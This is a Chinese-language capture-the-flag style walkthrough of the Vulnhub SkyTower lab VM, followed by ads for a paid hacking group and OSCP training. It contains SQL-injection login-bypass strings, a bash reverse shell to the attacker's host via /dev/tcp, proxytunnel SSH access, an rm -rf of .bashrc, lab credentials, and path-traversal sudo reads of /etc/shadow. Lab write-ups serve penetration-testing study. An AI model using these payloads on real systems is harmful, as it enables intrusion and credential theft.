Vulnhub-SkyTower靶机

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文，读者将能够对渗透Vulnhub系列SkyTower靶机有一定的了解

一、信息收集阶段

靶机下载地址：https://www.vulnhub.com/entry/skytower-1,96/
因为靶机为本地部署虚拟机网段，查看dhcp地址池设置。得到信息IP为：192.168.60.0/24

1、扫描网段，发现主机

nmap -sP 192.168.60.0/24 

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.60.179
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描（Script Scanning）可以帮助发现更多的信息，如漏洞、配置错误等

二、攻击阶段

1、web目录枚举

dirb http://192.168.60.179

2、sql万能密码测试

admin' or 1=1 --+

root' || 1 #
#and or被过滤我们可以换||这种写法

3、ssh链接

proxytunnel -a 6666 -p 192.168.60.179:3128 -d 192.168.60.179:22
# -a 本地端口监听
# -p 目标地址

ssh [email protected] -p 6666

ssh [email protected] -p 6666 "id"

nc -lvvp 4444  #kali监听4444端口
ssh [email protected] -p 6666 "/bin/bash -i >& /dev/tcp/192.168.60.128/4444 0>&1"

ssh [email protected] -p 6666 -t "cat .bashrc"

ssh [email protected] -p 6666 -t "rm -rf .bashrc"#删除靶机登录配置文件
python -m http.server 8080 #kali开机http微服务，提供给靶机下载
ssh [email protected] -p 6666 -t "wget http://192.168.60.128:8080/.bashrc"

4、内网信息收集

uname -a   #查看内核版本

find / -perm -4000 -print 2>/dev/null #查找具有特殊权限的文件

ps -aux|grep mysql

5、root/root登录mysql

6、查看数据库其他用户

show tables;
selsect * from login;    
#[email protected]    | hereisjohn  
#[email protected]    | ihatethisjob
#[email protected] | senseable   

7、切换其他用户

ssh [email protected] -p 6666   #登录成功，但是会自动被断开
ssh [email protected] -p 6666 -t "rm -rf .bashrc"#删除bashrc配置文件
ssh [email protected] -p 6666 -t "wget http://192.168.60.128:8080/.bashrc"#wget下载文件
ssh [email protected] -p 6666  #重新尝试登录

三、提权阶段

1、查看sudo命令

2、查看shadow密码文件

sudo cat /accounts/../etc/shadow

3、用sudo查看下sudo -l提示的目录

sudo ls /accounts/../root
sudo cat /accounts/../root/flag.txt

4、切换root账号

su root

内部帮会

可以加入一下我们的帮会，是真正的红队大佬创建的，里面会定时丢些网上没有的工具（比如安卓远控7.4，不过现在已经删除了，有时限，加入的记得看好时间），现在只要99就可以终身，后面人多了就会涨价了

OSCP培训咨询

在你还在犹豫是否要报名oscp的时候，别人已经行动了，在学习完oscp培训和泷羽sec的红队全栈课后别人在那月入过万了而你却还在为没有能力证明和没有工作而发愁，那为什么不行动起来呢？想报名oscp的欢迎找我咨询，oscp课程给的惊喜：